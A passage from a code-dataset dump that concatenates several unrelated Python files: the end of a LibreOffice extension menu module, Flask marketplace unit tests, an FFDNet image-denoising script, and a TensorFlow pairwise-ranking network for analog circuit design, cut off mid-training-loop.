win.getControl('ScrollBar')\n scrll.setPosSize(0,0,0,Height,8)\n except:\n log(inspect.stack,tb())\n\n\n def disposing(self,arg):\n if self.mb.debug: log(inspect.stack)\n \n try: \n # speichern, wenn Organon beendet wird.\n # aenderungen nach tabwechsel werden in Tab_Listener.activated() gespeichert\n if self.mb.props[T.AB].tastatureingabe:\n ordinal = self.mb.props[T.AB].selektierte_zeile\n bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][ordinal]\n path = uno.systemPathToFileUrl(self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname])\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname) \n\n if 'files' in self.mb.pfade: \n self.mb.class_Sidebar.speicher_sidebar_dict() \n self.mb.class_Sidebar.dict_sb_zuruecksetzen()\n\n self.mb.entferne_alle_listener() \n self.mb = None\n\n except:\n log(inspect.stack,tb())\n \n return False\n\n\n \n \n","sub_path":"source/py/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":78841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138417110","text":"import http\nimport json\nimport pytest\nfrom market import api, app, db\nfrom market.models import Item, User\nfrom unittest.mock import patch\nfrom api import routes\n\n\nclass TestItems:\n id = []\n\n def test_get_items_with_db(self):\n client = app.test_client()\n resp = client.get('/items')\n\n assert resp.status_code == http.HTTPStatus.OK\n\n @patch('api.services.item_service.ItemService.fetch_all_items', autospec=True)\n def test_get_items_mock_db(self, mock_db_call):\n client = app.test_client()\n resp = client.get('/items')\n\n mock_db_call.assert_called_once()\n assert resp.status_code == http.HTTPStatus.OK\n assert len(resp.json) == 0\n\n def test_create_item_with_db(self):\n client = app.test_client()\n data = {\n 'name': 'tester',\n 'price': 12,\n 'barcode': '9214789632188',\n 'description': 'st',\n\n }\n\n resp = client.post('/items', data=json.dumps(data), content_type='application/json')\n assert resp.status_code == http.HTTPStatus.CREATED\n assert data['name'] == 'tester'\n TestItems.id.append(data['name'])\n\n def test_create_item_with_mock_db(self):\n with patch(\"api.db.session.add\", autospec=True) as mock_session_add, \\\n patch(\"api.db.session.commit\", autospec=True) as mock_session_commit:\n client = app.test_client()\n data = {\n 'name': 'tester',\n 'price': 12,\n 'barcode': '9214789632188',\n 'description': 'st',\n }\n resp = client.post('/items', data=json.dumps(data), content_type='application/json')\n mock_session_add.assert_called_once()\n mock_session_commit.assert_called_once()\n\n def test_update_item_with_db(self):\n client = app.test_client()\n url = f'/items/{self.id[0]}'\n data = {\n 'name': 'Update name2',\n 'price': 32,\n 'barcode': '3214755532172',\n 'description': 'Updated desciption',\n }\n client.put(url, data=json.dumps(data), content_type='application/json')\n\n assert data['name'] == 'Update name2'\n\n\nclass Test_Flask_App:\n def test_home_page(self):\n client = app.test_client()\n resp = client.get('/home')\n\n assert resp.status_code == http.HTTPStatus.OK\n\n def test_market_page(self):\n client = app.test_client()\n resp = client.get('/market')\n assert resp.status_code == http.HTTPStatus.FOUND\n\n def test_register_page(self):\n client = app.test_client()\n resp = client.get('/register')\n assert resp.status_code == http.HTTPStatus.OK\n\n def test_login_page(self):\n client = app.test_client()\n resp = client.get('/login')\n assert resp.status_code == http.HTTPStatus.OK\n\n def test_logout_page(self):\n client = app.test_client()\n resp = client.get('/logout')\n assert resp.status_code == http.HTTPStatus.FOUND\n\n\nclass Test_Model:\n def test_password_hashing(self):\n u1 = User(username='u1')\n u1.password = 'topolya'\n assert u1.check_password_correction('tut') == False\n assert u1.check_password_correction('topolya') == True\n\n def test_can_purchase(self):\n budget = 2000\n i = Item(name='Iphone 10', description='description', barcode='123456789123', price=300)\n assert budget > i.price\n\n def test_can_sell(self):\n i1 = Item(name='TurboBookPro', description='The best invention by Apple', barcode='123456654456', price=2500)\n i2 = Item(name='MacBookPro', description='description2', barcode='123456789321', price=2000)\n item_obj = 'TurboBookPro'\n items = [i1.name, i2.name]\n assert item_obj in items\n\n def test_buy(self):\n u = User(username='Test_name', budget=1000)\n i = Item(name='TurboBookPro',description='The best invention ', barcode='123456654450', price=500)\n return u.budget >= i.price\n\n def test_sell(self):\n u = User(username='Test_name', budget=1000)\n i = Item(name='TurboBookPro',description='The best ', barcode='123456654458', price=500)\n start_budget = u.budget\n u.budget += i.price\n return u.budget >= start_budget\n","sub_path":"tests/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"467055034","text":"\"\"\"\nDenoise an image with the FFDNet denoising method\n\nCopyright (C) 2018, Matias Tassano \n\nThis program is free software: you can use, modify and/or\nredistribute it under the terms of the GNU General Public\nLicense as published by the Free Software Foundation, either\nversion 3 of the License, or (at your option) any later\nversion. You should have received a copy of this license along\nthis program. If not, see .\n\"\"\"\nimport os\nimport argparse\nimport time\nimport numpy as np\nimport cv2\nimport torch\nfrom PIL import Image\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom utils import batch_psnr, normalize, init_logger_ipol, \\\n variable_to_cv2_image, remove_dataparallel_wrapper, is_rgb\nfrom sanic import Sanic, response\n\n\"\"\"\nDefinition of the FFDNet model and its custom layers\n\nCopyright (C) 2018, Matias Tassano \n\nThis program is free software: you can use, modify and/or\nredistribute it under the terms of the GNU General Public\nLicense as published by the Free Software Foundation, either\nversion 3 of the License, or (at your option) any later\nversion. You should have received a copy of this license along\nthis program. If not, see .\n\"\"\"\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport functions\n\n\nclass UpSampleFeatures(nn.Module):\n r\"\"\"Implements the last layer of FFDNet\n \"\"\"\n\n def __init__(self):\n super(UpSampleFeatures, self).__init__()\n\n def forward(self, x):\n return functions.upsamplefeatures(x)\n\n\nclass IntermediateDnCNN(nn.Module):\n r\"\"\"Implements the middel part of the FFDNet architecture, which\n is basically a DnCNN net\n \"\"\"\n\n def __init__(self, input_features, middle_features, num_conv_layers):\n super(IntermediateDnCNN, self).__init__()\n self.kernel_size = 3\n self.padding = 1\n self.input_features = input_features\n self.num_conv_layers = num_conv_layers\n self.middle_features = middle_features\n if self.input_features == 5:\n self.output_features = 4 # Grayscale image\n elif self.input_features == 15:\n self.output_features = 12 # RGB image\n else:\n raise Exception('Invalid number of input features')\n\n layers = []\n layers.append(nn.Conv2d(in_channels=self.input_features, \\\n out_channels=self.middle_features, \\\n kernel_size=self.kernel_size, \\\n padding=self.padding, \\\n bias=False))\n layers.append(nn.ReLU(inplace=True))\n for _ in range(self.num_conv_layers - 2):\n layers.append(nn.Conv2d(in_channels=self.middle_features, \\\n out_channels=self.middle_features, \\\n kernel_size=self.kernel_size, \\\n padding=self.padding, \\\n bias=False))\n layers.append(nn.BatchNorm2d(self.middle_features))\n layers.append(nn.ReLU(inplace=True))\n layers.append(nn.Conv2d(in_channels=self.middle_features, \\\n out_channels=self.output_features, \\\n kernel_size=self.kernel_size, \\\n padding=self.padding, \\\n bias=False))\n self.itermediate_dncnn = nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.itermediate_dncnn(x)\n return out\n\n\nclass FFDNet(nn.Module):\n r\"\"\"Implements the FFDNet architecture\n \"\"\"\n\n def __init__(self, num_input_channels, test_mode=False):\n super(FFDNet, self).__init__()\n self.num_input_channels = num_input_channels\n self.test_mode = test_mode\n if self.num_input_channels == 1:\n # Grayscale image\n self.num_feature_maps = 64\n self.num_conv_layers = 15\n self.downsampled_channels = 5\n self.output_features = 4\n elif self.num_input_channels == 3:\n # RGB image\n self.num_feature_maps = 96\n self.num_conv_layers = 12\n self.downsampled_channels = 15\n self.output_features = 12\n else:\n raise Exception('Invalid number of input features')\n\n self.intermediate_dncnn = IntermediateDnCNN( \\\n input_features=self.downsampled_channels, \\\n middle_features=self.num_feature_maps, \\\n num_conv_layers=self.num_conv_layers)\n self.upsamplefeatures = UpSampleFeatures()\n\n def forward(self, x, noise_sigma):\n concat_noise_x = functions.concatenate_input_noise_map( \\\n x.data, noise_sigma.data)\n if self.test_mode:\n concat_noise_x = Variable(concat_noise_x, volatile=True)\n else:\n concat_noise_x = Variable(concat_noise_x)\n h_dncnn = self.intermediate_dncnn(concat_noise_x)\n pred_noise = self.upsamplefeatures(h_dncnn)\n return pred_noise\n\n\n# from srpgan_api import evaluate\n\napp = Sanic(__name__)\n\n# os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\nr\"\"\"Denoises an input image with FFDNet\n\"\"\"\n# Init logger\nlogger = init_logger_ipol()\n\n# Check if input exists and if it is RGB\n# Absolute path to model file\nmodel_fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), \\\n 'models/net_rgb.pth')\n\n# Create model\nprint('Loading model ...\\n')\nnet = FFDNet(num_input_channels=3, test_mode=True)\nmodel_fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), \\\n model_fn)\n\n# Load saved weights\nprint(model_fn)\nstate_dict = torch.load(model_fn, map_location='cpu')\ndevice_ids = [0]\n# model = nn.DataParallel(net, device_ids=device_ids).cuda()\nmodel = nn.DataParallel(net, device_ids=device_ids)\nmodel.load_state_dict(state_dict)\n\n# Sets the model in evaluation mode (e.g. it removes BN)\nmodel.eval()\n\n# Sets data type according to CPU or GPU modes\n# dtype = torch.cuda.FloatTensor\ndtype = torch.FloatTensor\n\ndef noise(imorig):\n imorig = np.expand_dims(imorig, 0)\n\n # Handle odd sizes\n expanded_h = False\n expanded_w = False\n sh_im = imorig.shape\n if sh_im[2] % 2 == 1:\n expanded_h = True\n imorig = np.concatenate((imorig, imorig[:, :, -1, :][:, :, np.newaxis, :]), axis=2)\n #\n if sh_im[3] % 2 == 1:\n expanded_w = True\n imorig = np.concatenate((imorig, imorig[:, :, :, -1][:, :, :, np.newaxis]), axis=3)\n\n imorig = normalize(imorig)\n imorig = torch.Tensor(imorig)\n\n # Add noise\n\n imnoisy = imorig.clone()\n\n # with torch.no_grad(): # PyTorch v0.4.0\n imorig, imnoisy = Variable(imorig.type(dtype), volatile=True), \\\n Variable(imnoisy.type(dtype), volatile=True)\n nsigma = Variable( \\\n torch.FloatTensor([25 / 255.]).type(dtype), volatile=True)\n\n # Measure runtime\n\n # Estimate noise and subtract it to the input image\n im_noise_estim = model(imnoisy, nsigma)\n outim = torch.clamp(imnoisy - im_noise_estim, 0., 1.)\n\n if expanded_h:\n imorig = imorig[:, :, :-1, :]\n outim = outim[:, :, :-1, :]\n imnoisy = imnoisy[:, :, :-1, :]\n\n if expanded_w:\n imorig = imorig[:, :, :, :-1]\n outim = outim[:, :, :, :-1]\n imnoisy = imnoisy[:, :, :, :-1]\n\n # Save images\n\n outimg = variable_to_cv2_image(outim)\n\n return outimg\n\n\ndef clean_noise(input):\n imorig = np.array(Image.fromarray(input).convert('RGB')).transpose(2, 0, 1)\n img_shape = imorig.shape\n h = 200\n num_h = img_shape[1] // h\n ori_h = h * num_h\n crop_h = img_shape[1] - ori_h\n img_shape_1 = img_shape[1]\n w = 200\n num_w = img_shape[2] // w\n ori_w = w * num_w\n crop_w = img_shape[2] - ori_w\n img_shape_2 = img_shape[2]\n images = []\n if crop_h == 0:\n img_shape_1 = img_shape_1 + 1\n imorig = cv2.resize(imorig.transpose(1, 2, 0), (imorig.shape[2], imorig.shape[1] + 1)).transpose(2, 0, 1)\n crop_h = 1\n if crop_w == 0:\n img_shape_2 = img_shape_2 + 1\n imorig = cv2.resize(imorig.transpose(1, 2, 0), (imorig.shape[2] + 1, imorig.shape[1])).transpose(2, 0, 1)\n crop_w = 1\n for i in range(num_h + 1):\n for j in range(num_w + 1):\n if i == num_h and j == num_w:\n img1 = imorig[:, i * int(h):i * int(h) + crop_h, j * int(w):j * int(w) + crop_w]\n if i == num_h:\n img1 = imorig[:, i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)]\n if j == num_w:\n img1 = imorig[:, i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w]\n img1 = imorig[:, i * int(h):(i + 1) * int(h), j * int(w):(j + 1) * int(w)]\n images.append([i, j, img1])\n denoise_images = []\n for index, i in enumerate(images):\n denoise_images.append([i[0], i[1], noise(i[2])])\n new_img = np.zeros((img_shape_1, img_shape_2, 3))\n for img in denoise_images:\n i, j = img[:2]\n if i == num_h and j == num_w:\n img[2] = cv2.resize(img[2], (\n new_img[int(i) * h:(int(i) + 1) * h + crop_h, int(j) * w:(int(j) + 1) * w + crop_w].shape[-2::-1]))\n new_img[i * int(h):i * int(h) + crop_h, j * int(w):j * int(w) + crop_w] = img[2]\n if i == num_h:\n img[2] = cv2.resize(img[2],\n (new_img[i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)].shape[-2::-1]))\n new_img[i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)] = img[2]\n if j == num_w:\n img[2] = cv2.resize(img[2],\n (new_img[i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w].shape[-2::-1]))\n new_img[i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w] = img[2]\n new_img[int(i) * h:(int(i) + 1) * h, int(j) * w:(int(j) + 1) * w] = img[2]\n # new_img = evaluate(new_img)\n # image_path = request.args.get('filepath').split('/')\n # image_path[2] = 'clean'\n # new_image_path = '//172.30.20.157/project' + '/'.join(image_path[:-1])\n # if not os.path.exists(new_image_path):\n # os.makedirs(new_image_path)\n # new_image_path = new_image_path + '/' + image_path[-1]\n # Image.fromarray(new_img.astype(np.uint8)).save(new_image_path, dpi=(300., 300.), quality=60)\n return new_img\n\n\nimorig = Image.open('th (1).jpg')\nimorig = np.array(imorig)\nimg = clean_noise(imorig)\nImage.fromarray(img.astype(np.uint8)).save('333333.png')\n# if __name__ == \"__main__\":\n# app.config.KEEP_ALIVE = False\n# app.config.REQUEST_TIMEOUT = 900\n# app.config.RESPONSE_TIMEOUT = 900\n# app.run(host='0.0.0.0', port=8003)\n","sub_path":"ffdent_api.py","file_name":"ffdent_api.py","file_ext":"py","file_size_in_byte":10847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20849432","text":"import numpy as np\nimport tensorflow as tf\nimport math\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport pickle\n\nfrom framework.wrapper import TwoStageComplete as sim\n\n# np.random.seed(10)\n# random.seed(10)\n\neval_core = sim.EvaluationCore(\"./framework/yaml_files/two_stage_full.yaml\")\ndef evaluate_individual(individual, verbose=False):\n # TODO\n # returns a scalar number representing the cost function of that individual\n # return (sum(individual),)\n mp1_idx = int(individual[0])\n mn1_idx = int(individual[1])\n mn3_idx = int(individual[2])\n mp3_idx = int(individual[3])\n mn5_idx = int(individual[4])\n mn4_idx = int(individual[5])\n cc_idx = int(individual[6])\n result = eval_core.cost_fun(mp1_idx, mn1_idx, mp3_idx, mn3_idx, mn4_idx, mn5_idx, cc_idx, verbose=verbose)\n return result\n\ndef generate_data_set(n=10, evaluate=True):\n if evaluate:\n print(\"[info] generating %d random data\" %n)\n data_set, cost_set, bw_set, gain_set , ibias_set = [], [], [], [], []\n\n for _ in range(n):\n\n mp1_idx = random.randint(0 ,len(eval_core.mp1_vec)-1)\n mn1_idx = random.randint(0 ,len(eval_core.mn1_vec)-1)\n mn3_idx = random.randint(0 ,len(eval_core.mn3_vec)-1)\n mp3_idx = random.randint(0 ,len(eval_core.mp3_vec)-1)\n mn5_idx = random.randint(0 ,len(eval_core.mn5_vec)-1)\n mn4_idx = random.randint(0 ,len(eval_core.mn4_vec)-1)\n cc_idx = random.randint(0 ,len(eval_core.cc_vec)-1)\n\n sample_dsn = [mp1_idx, mn1_idx, mn3_idx, mp3_idx, mn5_idx, mn4_idx, cc_idx]\n data_set.append(sample_dsn)\n if evaluate:\n result = evaluate_individual(sample_dsn, verbose=False)\n cost = result[0]\n cost_set.append(cost)\n\n\n if evaluate:\n return np.array(data_set), np.array(cost_set)\n else:\n return np.array(data_set), _\n\n# data generation and preprocessing. for new environments these numbers should be readjusted\nn_init_samples = 200\nn_new_samples = 10\nnum_designs = 2\nnum_features_per_design = 7\nnum_classes = 2\nnum_nn_features = num_designs * num_features_per_design\nvalid_frac = 0.2\nmax_n_retraining = 15\n\nk_top = 10 #during training only consider comparison between k_top ones and the others\nref_dsn_idx = k_top #during inference compare new randomly generated samples with this design in the sorted dataset\n\n# training settings\nnum_epochs = 100\nbatch_size = 8\ndisplay_step = 10\nckpt_step = 10\n\nsummary_dir = 'genetic_nn/summary'\n\n\n# nn hyper parameters\nnhidden1 = 20 # number of hidden nodes\nnhidden2 = 20\nnhidden3 = 20\n\nlearning_rate = 0.03\ndecay_steps = 10000\ndecay_rate = 0.5\n\nl2_reg_scale = 0.003\nDROP_OUT_PROB = 0.5\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n # tf.set_random_seed(10)\n tf_train_dataset = tf.placeholder(tf.float32, shape=(None, num_nn_features), name='train_in')\n tf_train_labels = tf.placeholder(tf.float32, shape=(None, num_classes), name='train_labels')\n loss_weights = tf.placeholder(tf.float32, shape=[None, 1], name='adjustment_weights')\n keep_prob = tf.placeholder(tf.float32)\n\n with tf.variable_scope('normalizer'):\n mu = tf.Variable(tf.zeros([num_nn_features], dtype=tf.float32), name='training_set_mu', trainable=False)\n std = tf.Variable(tf.zeros([num_nn_features], dtype=tf.float32), name='training_set_std', trainable=False)\n tf_train_dataset_norm = (tf_train_dataset - mu) / (std + 1e-6)\n with tf.variable_scope(\"regulizer\"):\n l2_reg_fn = tf.contrib.layers.l2_regularizer(l2_reg_scale, scope=\"l2_reg\")\n\n\n def nn_model(input_data, name='nn_model', reuse=False, is_test=False):\n with tf.variable_scope(name):\n layer1 = tf.contrib.layers.fully_connected(input_data, nhidden1, reuse=reuse, scope='fc1',\n weights_regularizer=l2_reg_fn)\n do1 = tf.nn.dropout(layer1, keep_prob)\n layer2 = tf.contrib.layers.fully_connected(do1, nhidden2, reuse=reuse, scope='fc2',\n weights_regularizer=l2_reg_fn)\n do2 = tf.nn.dropout(layer2, keep_prob)\n layer3 = tf.contrib.layers.fully_connected(do2, nhidden3, reuse=reuse, scope='fc3',\n weights_regularizer=l2_reg_fn)\n do3 = tf.nn.dropout(layer3, keep_prob)\n logits = tf.contrib.layers.fully_connected(do3, num_classes,\n activation_fn=None,\n weights_regularizer=l2_reg_fn,\n reuse=reuse, scope='fc_out')\n return logits\n\n with tf.variable_scope('regulizer'):\n reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n reg_loss = tf.reduce_sum(reg_losses)\n\n train_logits = nn_model(tf_train_dataset_norm, name='train_nn')\n train_prediction = tf.nn.softmax(train_logits)\n with tf.variable_scope(\"loss\"):\n likelihoods = tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels,\n logits=train_logits)\n weighted_likelihoods = tf.multiply(likelihoods, loss_weights)\n loss = tf.reduce_mean(weighted_likelihoods) + reg_loss\n\n with tf.variable_scope(\"optimizer\"):\n # global_step = tf.Variable(0, name='global_step', trainable=False)\n # starter_learning_rate = learning_rate\n # lr = tf.train.exponential_decay(learning_rate, global_step, decay_steps, decay_rate, staircase=True)\n # optimizer = tf.train.GradientDescentOptimizer(lr).minimize(loss, global_step=global_step)\n # tf.summary.scalar('learning_rate', learning_rate)\n # tf.summary.scalar('lr', lr)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n\n def accuracy(predictions, labels, name='accuracy'):\n with tf.variable_scope(name):\n # predicted_label = tf.cast(tf.greater(predictions, 0.99999), tf.float32)\n # correct_predictions = tf.equal(predicted_label, labels)\n correct_predictions = tf.equal(tf.argmax(predictions, axis=1), tf.argmax(labels, axis=1))\n accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n return accuracy\n\n tf_training_accuracy = accuracy(train_prediction, tf_train_labels, name='train_accuracy')\n\n # validation prediction\n tf_valid_dataset = tf.placeholder(tf.float32, shape=(None, num_nn_features), name='valid_in')\n tf_valid_labels = tf.placeholder(tf.float32, shape=(None, num_classes), name='valid_labels')\n with tf.variable_scope('normalizer', reuse=True):\n tf_valid_dataset_norm = (tf_valid_dataset - mu) / (std + 1e-6)\n valid_logits = nn_model(tf_valid_dataset_norm, name='train_nn', reuse=True)\n\n valid_prediction = tf.nn.softmax(valid_logits)\n valid_accuracy = accuracy(valid_prediction, tf_valid_labels, name='validation_accuracy')\n # summarize a couple of things\n tf.summary.scalar(\"train_loss\", loss)\n tf.summary.scalar(\"train_accuracy\", tf_training_accuracy)\n tf.summary.scalar(\"validation_accuracy\", valid_accuracy)\n\n # summarize weights and biases\n all_vars= tf.global_variables()\n def get_var(name):\n for i in range(len(all_vars)):\n if all_vars[i].name.startswith(name):\n return all_vars[i]\n return None\n tf.summary.histogram(\"fc1_weight\", get_var('train_nn/fc1/weights'))\n tf.summary.histogram(\"fc1_biases\", get_var('train_nn/fc1/biases'))\n tf.summary.histogram(\"fc2_weight\", get_var('train_nn/fc2/weights'))\n tf.summary.histogram(\"fc2_biases\", get_var('train_nn/fc2/biases'))\n tf.summary.histogram(\"fc3_weight\", get_var('train_nn/fc3/weights'))\n tf.summary.histogram(\"fc3_biases\", get_var('train_nn/fc3/biases'))\n tf.summary.histogram(\"fc_out_weight\", get_var('train_nn/fc_out/weights'))\n tf.summary.histogram(\"fc_out_biases\", get_var('train_nn/fc_out/biases'))\n\n # inference phase\n merged_summary = tf.summary.merge_all()\n\nclass BatchGenerator(object):\n def __init__(self, data_set, labels, weights, batch_size):\n self._data_set = data_set\n self._labels = labels\n self._weights = weights\n self._data_size = data_set.shape[0]\n self._batch_size = batch_size\n self._segment = self._data_size // batch_size\n self.last_index = 0\n\n def next(self):\n\n if ((self.last_index+1)*self._batch_size > self._data_size):\n data1 = self._data_set[self.last_index * self._batch_size:,:]\n data2 = self._data_set[:((self.last_index+1)*self._batch_size)%self._data_size, :]\n labels1 = self._labels[self.last_index * self._batch_size:, :]\n labels2 = self._labels[:((self.last_index+1)*self._batch_size)%self._data_size, :]\n weights1 = self._weights[self.last_index * self._batch_size:]\n weights2 = self._weights[:((self.last_index+1)*self._batch_size)%self._data_size]\n batch_data = np.concatenate((data1, data2), axis=0)\n batch_labels = np.concatenate((labels1, labels2), axis=0)\n batch_weights = np.concatenate((weights1, weights2), axis=0)\n else:\n batch_data = self._data_set[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size, :]\n batch_labels = self._labels[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size, :]\n batch_weights = self._weights[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size]\n\n self.last_index = (self.last_index+1) % (self._segment+1)\n return batch_data, batch_labels, batch_weights\n\ndef combine(dataset, cost, for_training=False):\n # this combine function is used when generating nn data for training\n # label [0 1] means design1 is \"sufficiently\" worse than than design2 (e.g cost1 is at\n # least %10 higher than cost2) and label [1 0] means it is not the case.\n # it is really important to combine those pairs that are going to be useful during inference\n # since during inference one of the designs is always good we should make sure that during training also\n # this bias on some level exists. For this reason we will sort the data set and produce pairs that always have at least\n # one design from top k_top designs.\n\n assert k_top < len(dataset)\n\n sorted_indices = sorted(range(len(cost)), key=lambda x: cost[x])\n sorted_dataset = dataset[sorted_indices]\n sorted_cost = cost[sorted_indices]\n\n category = []\n nn_dataset, nn_labels = [], []\n cost_arr = [] # just for debbuging purposes\n\n # adjustment weights are for adjusting the difference in the number of samples that are like (x0,x1) where\n # both x0 and x1 are good with the samples that have at least one bad x.\n adjustment_weights = []\n num_both_good_comparisons = k_top*(k_top-1)/2\n n = len(sorted_dataset)\n num_one_bad_comparisons = n*(n-1)/2 - (n-k_top) * (n-k_top-1)/2\n\n # weights_good = (num_one_bad_comparisons)#/(num_one_bad_comparisons+num_both_good_comparisons)\n weights_good = 1\n # weights_bad = (num_both_good_comparisons)#/(num_one_bad_comparisons+num_both_good_comparisons)\n weights_bad = 1\n\n for i in range(k_top):\n for j in range(i+1, len(sorted_dataset)):\n # (x0,x1) (x0,x2) ... x0 is always going to be the first one going into nn but we also want to have x0\n # to be the second term. so the probability of having (x0,x1) and (x1,x0) is equal.\n\n # if random.random() < 0.5:\n # nn_dataset.append(list(sorted_dataset[i,:])+list(sorted_dataset[j,:]))\n # cost_arr.append([sorted_cost[i], sorted_cost[j]])\n # label = 1 if (sorted_cost[i] > sorted_cost[j]) else 0\n # else:\n # nn_dataset.append(list(sorted_dataset[j,:])+list(sorted_dataset[i,:]))\n # cost_arr.append([sorted_cost[j], sorted_cost[i]])\n # label = 1 if (sorted_cost[j] > sorted_cost[i]) else 0\n\n # (x0,x1) part\n nn_dataset.append(list(sorted_dataset[i,:])+list(sorted_dataset[j,:]))\n cost_arr.append([sorted_cost[i], sorted_cost[j]])\n label = 1 if (sorted_cost[i] > sorted_cost[j]) else 0\n if j < k_top:\n adjustment_weights.append(weights_good)\n\n else:\n adjustment_weights.append(weights_bad)\n category.append(label)\n\n # (x1,x0) part\n nn_dataset.append(list(sorted_dataset[j,:])+list(sorted_dataset[i,:]))\n cost_arr.append([sorted_cost[j], sorted_cost[i]])\n label = 1 if (sorted_cost[j] > sorted_cost[i]) else 0\n if j < k_top:\n adjustment_weights.append(weights_good)\n else:\n adjustment_weights.append(weights_bad)\n category.append(label)\n\n\n\n nn_labels = np.zeros((len(category), num_classes))\n nn_labels[np.arange(len(category)), category] = 1\n return np.array(nn_dataset), np.array(nn_labels), np.array(cost_arr), np.array(adjustment_weights)\n\ndef shuffle_dataset(dataset, labels):\n \"\"\"\n :param dataset: this is suppose to be a list of individuals\n :param labels: this is a numpy array\n :return:\n \"\"\"\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\ndef train(session, dataset, cost, writer, num_epochs=10, batch_size=128):\n all_vars = tf.global_variables()\n saver = tf.train.Saver(all_vars)\n nn_dataset, nn_labels, cost_arr, adjustment_weights = combine(dataset, cost)\n\n print(\"[Debug_data] design1, design2, costs, label\")\n\n # for i in range(len(nn_dataset)):\n # design1 = nn_dataset[i, :num_features_per_design]\n # design2 = nn_dataset[i, num_features_per_design:]\n # costs = cost_arr[i,:]\n # label = nn_labels[i,:]\n # print(\"[Debug_data] {} -> {} -> {} -> {}\".format(design1, design2, costs, label))\n # nn_dataset, nn_labels = shuffle_dataset(nn_dataset, nn_labels) # Do we really need to shuffle? yes we do :)\n\n\n permutation = np.random.permutation(nn_labels.shape[0])\n nn_dataset = nn_dataset[permutation]\n nn_labels = nn_labels[permutation]\n adjustment_weights = adjustment_weights[permutation]\n\n # print(\"[Debug_shuffle] sample -> label \")\n # for i in range(len(nn_dataset)):\n # print(\"[Debug_shuffle] {} -> {} \" .format(nn_dataset[i], nn_labels[i]))\n\n boundry_index = nn_dataset.shape[0] - int(nn_dataset.shape[0]*valid_frac)\n train_dataset = nn_dataset[:boundry_index]\n train_labels = nn_labels[:boundry_index]\n valid_dataset = nn_dataset[boundry_index:]\n valid_labels = nn_labels[boundry_index:]\n\n train_weights = adjustment_weights[:boundry_index]\n valid_weights = adjustment_weights[boundry_index:]\n\n data_dict = {'train_input': train_dataset,\n 'train_labels': train_labels,\n 'valid_input': valid_dataset,\n 'valid_labels': valid_labels}\n\n with open('genetic_nn/checkpoint/two_stage/train_valid_data.pkl', 'wb') as f:\n pickle.dump(data_dict, f)\n\n # find the mean and std of dataset for normalizing\n train_mean = np.mean(train_dataset, axis=0)\n train_std = np.std(train_dataset, axis=0)\n\n print(\"[info] dataset size:%d\" %len(dataset))\n print(\"[info] combine size:%d\" %len(nn_dataset))\n print(\"[info] train_dataset: positive_samples/total ratio : %d/%d\" %(np.sum(train_labels, axis=0)[0], train_labels.shape[0]))\n print(\"[info] valid_dataset: positive_samples/total ratio : %d/%d\" %(np.sum(valid_labels, axis=0)[0], valid_labels.shape[0]))\n\n batch_generator = BatchGenerator(train_dataset, train_labels, train_weights, batch_size)\n print(\"[info] training the model with dataset ....\")\n\n total_n_batches = int(len(train_dataset) // batch_size)\n print(\"[info] number of total batches: %d\" %total_n_batches)\n print(30*\"-\")\n\n tf.global_variables_initializer().run()\n mu.assign(train_mean).op.run()\n std.assign(train_std).op.run()\n\n for epoch in range(num_epochs):\n avg_loss = 0.\n avg_train_acc = 0.\n avg_valid_acc = 0.\n feed_dict = {}\n for iter in range(total_n_batches):\n batch_data, batch_labels, batch_weights = batch_generator.next()\n drop_out_prob = DROP_OUT_PROB\n feed_dict = {tf_train_dataset :batch_data,\n tf_train_labels :batch_labels,\n tf_valid_dataset :valid_dataset,\n tf_valid_labels :valid_labels,\n keep_prob :drop_out_prob,\n loss_weights :batch_weights[:, None]}\n\n _, l, valid_acc, train_acc= session.run([optimizer, loss, valid_accuracy, tf_training_accuracy],\n feed_dict=feed_dict)\n avg_loss += l / total_n_batches\n avg_train_acc += train_acc / total_n_batches\n avg_valid_acc += valid_acc / total_n_batches\n\n s = session.run(merged_summary, feed_dict=feed_dict)\n\n # sample_input = np.array([[19, 38, 220, 55], [43, 10, 26, 25]])\n # sample_predictions = session.run(train_prediction, feed_dict={tf_train_dataset: sample_input})\n # print(\"[Debug] sample_prediction {}, {}\".format(sample_predictions[0], sample_predictions[1]))\n writer.add_summary(s, epoch)\n if epoch % ckpt_step == 0:\n saver.save(session, 'genetic_nn/checkpoint/two_stage/checkpoint.ckpt')\n dict_to_save = dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/data.pkl', 'wb') as f:\n pickle.dump(dict_to_save, f)\n if epoch % display_step == 0:\n print(\"[epoch %d] loss: %f\" %(epoch, avg_loss))\n print(\"train_acc = 